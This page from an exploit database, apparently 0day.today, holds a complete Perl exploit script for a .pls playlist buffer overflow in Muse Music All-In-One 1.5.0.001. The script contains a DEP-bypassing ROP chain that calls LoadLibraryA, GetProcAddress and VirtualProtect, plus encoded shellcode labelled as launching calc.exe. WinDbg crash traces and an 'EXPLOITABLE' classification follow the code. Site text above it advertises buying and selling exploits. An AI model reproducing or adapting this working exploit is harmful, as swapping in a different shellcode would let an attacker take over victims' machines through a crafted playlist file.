0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Muse Music All-In-One 1.5.0.001 .pls File Buffer Overflow (DEP Bypass)
#!/usr/bin/perl # #[+]Exploit Title: Muse Music All-In-One PLS File Buffer Overflow Exploit(DEP Bypass) #[+]Date: 25\09\2011(DD\MM\YYYY) #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://download.cnet.com/Muse-Music-All-In-One/3000-2141_4-10070288.html #[+]Version: 1.5.0.001 #[+]Tested On: WIN-XP SP3 Brazilian Portuguese #[+]CVE: N/A # #[+]Info: #This exploit can be universal, if the buffer to overwrite EIP stay for all Windows systems equal. ;) #To reproduce click in File -> Open... -> Select Exploit.pls and see the Calc. # use strict; use warnings; print q{ Created By C4SS!0 G0M3S E-mail netfuzzer@hotmail.com Blog net-fuzzer.blogspot.com }; print "\n\t\t[+]Creating Exploit File...\n"; sleep(2); ##########################ROP START HERE############################################### my $rop = pack('V',0x0043bc93); # POP EAX # RETN $rop .= "AAAA" x 4; # JUNK $rop .= pack('V',0x00339014); # PTR to a Call DWORD for LoadLibraryA $rop .= pack('V',0x1002042f); # POP EBP # RETN $rop .= pack('V',0x0044387e); # ADD ESP,40 # RETN == Return of LoadLibraryA $rop .= pack('V',0x100255d1); # POP ESI # RETN $rop .= pack('V',0x003367C1); # JMP [EAX] // Jump to [DWORD EAX] == LoadLibraryA $rop .= pack('V',0x004a296b); # POP EDI # RETN $rop .= pack('V',0x004a296c); # RETN $rop .= pack('V',0x004b0519); # PUSHAD # RETN $rop .= "kernel32.dll\x00"; $rop .= "A" x 35; # JUNK #############################Call GetProcAddress################################### $rop .= pack('V',0x004b2507); # XCHG EAX,EBX # RETN $rop .= pack('V',0x004a296b); # POP EDI # RETN $rop .= pack('V',0x003367C1); # JMP [EAX] // Jump to [DWORD EAX] == GetProcAddress $rop .= pack('V',0x100255d1); # POP ESI # RETN $rop .= pack('V',0x0044387e); # ADD ESP,40 # RETN == Return of GetProcAddress $rop .= pack('V',0x004b2507); # XCHG EAX,EBX # RETN $rop .= pack('V',0x004b9563); # XCHG EAX,EBP # RETN $rop .= pack('V',0x0043bc93); # POP EAX # RETN $rop .= pack('V',0x00339010); # PTR to GetProcAddress $rop .= pack('V',0x004a296b); # POP EDI # RETN $rop .= pack('V',0x003367C1); # JMP [EAX] // Jump to [DWORD EAX] == GetProcAddress $rop .= pack('V',0x004b0519); # PUSHAD # RETN $rop .= "VirtualProtect\x00"; $rop .= "A" x 33; # JUNK #############################Call VirtualProtect#################################### $rop .= pack('V',0x004b2507); # XCHG EAX,EBX # RETN $rop .= pack('V',0x00432a42); # PUSH ESP # POP EDI # XOR EAX,EAX # POP ESI # RETN 08 $rop .= "VVVV"; # JUNK $rop .= pack('V',0x004a296c) x 3; # RETN $rop .= pack('V',0x10018000); # XOR EAX,EAX # RETN $rop .= pack('V',0x0043bc93); # POP EAX # RETN $rop .= pack('V',0x00000040); # Value of flNewProtect $rop .= pack('V',0x00478695); # XCHG EAX,EDX # RETN $rop .= pack('V',0x10018000); # XOR EAX,EAX # RETN $rop .= pack('V',0x1001433f); # ADD EAX,EDI # POP EDI # POP ESI # RETN $rop .= "A" x 8; # JUNK $rop .= pack('V',0x1002028b); # POP ECX # RETN $rop .= "\x00\x00\x00\x00"; $rop .= pack('V',0x1000B6ED); # ADD ECX,EAX # MOV DWORD PTR DS:[10085B38],ECX # RETN $rop .= pack('V',0x004b2507); # XCHG EAX,EBX # RETN $rop .= pack('V',0x1002042f); # POP EBP # RETN $rop .= pack('V',0x10012107); # PUSH ESP # RETN == Return of VirtualProtect $rop .= pack('V',0x004a05b8); # POP EBX # RETN $rop .= pack('V',0x00000500); # Value of dwSize $rop .= pack('V',0x004b2c56); # XCHG EAX,ESI # RETN $rop .= pack('V',0x004a296b); # POP EDI # RETN $rop .= pack('V',0x004a296c); # RETN $rop .= pack('V',0x004b0519); # PUSHAD # RETN ##########################ROP END HERE################################################# my $shellcode = "\xb8\x4b\xaf\x2d\x0e\xda\xde\xd9\x74\x24\xf4\x5b\x29\xc9" . "\xb1\x32\x83\xeb\xfc\x31\x43\x0e\x03\x08\xa1\xcf\xfb\x72" . "\x55\x86\x04\x8a\xa6\xf9\x8d\x6f\x97\x2b\xe9\xe4\x8a\xfb" . "\x79\xa8\x26\x77\x2f\x58\xbc\xf5\xf8\x6f\x75\xb3\xde\x5e" . "\x86\x75\xdf\x0c\x44\x17\xa3\x4e\x99\xf7\x9a\x81\xec\xf6" . "\xdb\xff\x1f\xaa\xb4\x74\x8d\x5b\xb0\xc8\x0e\x5d\x16\x47" . "\x2e\x25\x13\x97\xdb\x9f\x1a\xc7\x74\xab\x55\xff\xff\xf3" . "\x45\xfe\x2c\xe0\xba\x49\x58\xd3\x49\x48\x88\x2d\xb1\x7b" . # Shellcode Winexec "Calc.exe" "\xf4\xe2\x8c\xb4\xf9\xfb\xc9\x72\xe2\x89\x21\x81\x9f\x89" . # Bad chars "\x00\x20\x3d\x0a\x0d\xff" "\xf1\xf8\x7b\x1f\xe4\x5a\x0f\x87\xcc\x5b\xdc\x5e\x86\x57" . "\xa9\x15\xc0\x7b\x2c\xf9\x7a\x87\xa5\xfc\xac\x0e\xfd\xda" . "\x68\x4b\xa5\x43\x28\x31\x08\x7b\x2a\x9d\xf5\xd9\x20\x0f" . "\xe1\x58\x6b\x45\xf4\xe9\x11\x20\xf6\xf1\x19\x02\x9f\xc0" . "\x92\xcd\xd8\xdc\x70\xaa\x17\x97\xd9\x9a\xbf\x7e\x88\x9f" . "\xdd\x80\x66\xe3\xdb\x02\x83\x9b\x1f\x1a\xe6\x9e\x64\x9c" . "\x1a\xd2\xf5\x49\x1d\x41\xf5\x5b\x7e\x04\x65\x07\x81"; my $buf = "A" x 1300; $buf .= $rop; $buf .= "\x90" x 10; $buf .= $shellcode; $buf .= "A" x 2000; open(my $file,">Exploit.pls") or die "[-]Error: $!\n"; print $file $buf; close $file; print "\t\t[+]File Exploit.pls Created Successfully.\n"; sleep(1); =head (8f4.8f8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000041 ebx=0000007b ecx=ffffffff edx=00000002 esi=00130000 edi=77c3fce0 eip=77c24609 esp=0012ea1c ebp=0012ec34 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll - msvcrt!wscanf+0x2343: 77c24609 8806 mov byte ptr [esi],al ds:0023:00130000=41 0:000> .exr -1 ExceptionAddress: 77c24609 (msvcrt!wscanf+0x00002343) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000001 Parameter[1]: 00130000 Attempt to write to address 00130000 0:000> .lastevent Last event: 8f4.8f8: Access violation - code c0000005 (first chance) debugger time: Sun Sep 25 19:22:13.937 2011 (UTC - 3:00) 0:000> k ChildEBP RetAddr WARNING: Stack unwind information not available. Following frames may be wrong. 0012ec34 77c212df msvcrt!wscanf+0x2343 *** WARNING: Unable to verify checksum for Muse.exe *** ERROR: Symbol file could not be found. Defaulted to export symbols for Muse.exe - 0012ec70 00498d3a msvcrt!fscanf+0x28 0012eca4 7c91a3cb Muse!CSdll::operator=+0x974fa 0012ecb8 7c91a351 ntdll!RtlpUnWaitCriticalSection+0x86c 00000000 00000000 ntdll!RtlpUnWaitCriticalSection+0x7f2 0:000> g (8f4.8f8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000 eip=41414141 esp=0012e64c ebp=0012e66c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 41414141 ?? ??? 0:000> !load winext/msec.dll 0:000> !exploitable -v HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address: 0x41414141 First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) Exception Sub-Type: Read Access Violation Exception Hash (Major/Minor): 0x71174239.0x2a6b1069 Stack Trace: Unknown ntdll!RtlConvertUlongToLargeInteger+0x6a ntdll!RtlConvertUlongToLargeInteger+0x3c ntdll!KiUserExceptionDispatcher+0xe msvcrt!fscanf+0x28 Muse!CSdll::operator=+0x974fa ntdll!RtlpUnWaitCriticalSection+0x86c ntdll!RtlpUnWaitCriticalSection+0x7f2 Instruction Address: 0x0000000041414141 Description: Read Access Violation at the Instruction Pointer Short Description: ReadAVonIP Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at Unknown Symbol @ 0x0000000041414141 called from ntdll!RtlConvertUlongToLargeInteger+0x000000000000006a (Hash=0x71174239.0x2a6b1069) Access violations at the instruction pointer are exploitable if not near NULL. =cut # 0day.today [2024-12-23] #